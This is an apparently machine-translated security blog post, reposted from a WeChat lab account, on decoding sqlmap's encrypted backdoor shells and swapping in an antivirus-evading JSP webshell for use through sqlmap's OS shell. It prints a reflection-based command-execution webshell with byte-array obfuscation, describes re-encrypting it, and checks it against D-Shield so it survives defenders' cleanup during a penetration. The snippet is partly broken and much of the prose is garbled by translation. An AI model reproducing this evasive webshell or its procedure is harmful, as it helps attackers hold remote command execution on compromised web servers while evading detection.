Sqlmap implements OS shell and custom shell to avoid killing and piercing a shuttle


Today, when I was paddling in the company, I accidentally saw an article about the function of sqlmap OS shell. This article describes the specific process of OS shell in detail, but the author finally overturned when implementing the custom shell

So there is this article
As the author said, this is indeed a bit superfluous. However, it is not useless. If the network administrator of the other party finds abnormal traffic, he may temporarily upload the killing tool to kill the Trojan horse on the website. At this time, embedding a kill free shell may win valuable time for our penetration


Although the shell used by sqlmap is stored in binary form, it must be decrypted when we use OS shell. Sqlmap will first load the shell in binary form, decode it in some way, and then write the file.
The shell of sqlmap is stored in \ data\shell\backdoors\

First, we can search the sqlmap directory for the operation backdoor***_ Documents

The related operations on decoding are located in \ lib \ core \ common py

You can see that decloak totemp receives a filenam parameter and calls the decleak function to decode. According to the literal meaning of the return variable, guess that the returned content is the decoded content of the file, and give a detailed call method in the function description part.
According to the introduction statement, it is found that the declack comes from extra cloak. Cloak package

In \ extra \ cloak \ cloak Py, the specific encryption and decryption function is found

The decryption process is roughly as follows: use the defined KEY to call xor function for xor, and then use zlib Decode by decompress
The mian function also gives the specific use method (really sweet ~)

With the decryption file, we pass in the corresponding parameters according to the parameter format

Parameter name notes
-i input file
-o output file
-d Decryption operation [encryption without this parameter]

Here I take jsp as an example. The process of other formats is the same

After running, open backdoor JSP, you can see the source code
Original format

After decoding

It is found through the source code that it is a cmd horse. Next, we can replace the code that specifically executes the cmd command with our kill free code or other functions. Here I use a reflected cmd horse to replace it

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.util.Scanner" %>

if(request.getParameter("cmd") != null){
String str = request.getParameter("cmd");
String rt = new String(new byte[]{106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101});
Class<?> c = Class.forName(rt);
Method m1 = c.getMethod(new String(new byte[]{103, 101, 116, 82, 117, 110, 116, 105, 109, 101}));
Method m2 = c.getMethod(new String(new byte[]{101, 120, 101, 99}), String.class);

Object obj2 = m2.invoke(m1.invoke(null, new Object[]{}), new Object[]{str});

Method m = obj2.getClass().getMethod(new String(new byte[]{103, 101, 116, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109}));

Scanner s = new Scanner((InputStream) m.invoke(obj2, new Object[]{})).useDelimiter("\\A");
String result = s.hasNext() ? s.next() : "";

Note: in order to use OS shell function normally in sqlmap, the received parameters of the replaced shell must be consistent with the original
After the replacement, the decloak script is also used to encrypt the source file

Generate backdoor_diy.jsp_ After encrypting the file, copy it to the shell directory of sqlmap (note to change the file name to backdoor.jsp_)
Finally, we set up a local java injection environment for testing

Test with OS shell

The function is normal. Confirm the uploaded tmpbqlnx JSP is our modified shell

Wooden problem, finally drag in the D shield to test

The source code will be published in github later

reference resources

Exploration of sqlmap OS shell

Undertake CTF training and issue questions [complete series] Penetration test project (including red and blue direction), safety consulting project

                                           wx : gnosismask

This article is shared from wechat official account - black umbrella attack and Defense Laboratory (hack_umbrella).
In case of infringement, please contact support@oschina.cn Delete.
Article participation“ OSC source creation plan ”, you who are reading are welcome to join us and share with us.

Tags: JavaEE sqlmap

Posted by wilded1 on Wed, 04 May 2022 04:09:00 +0300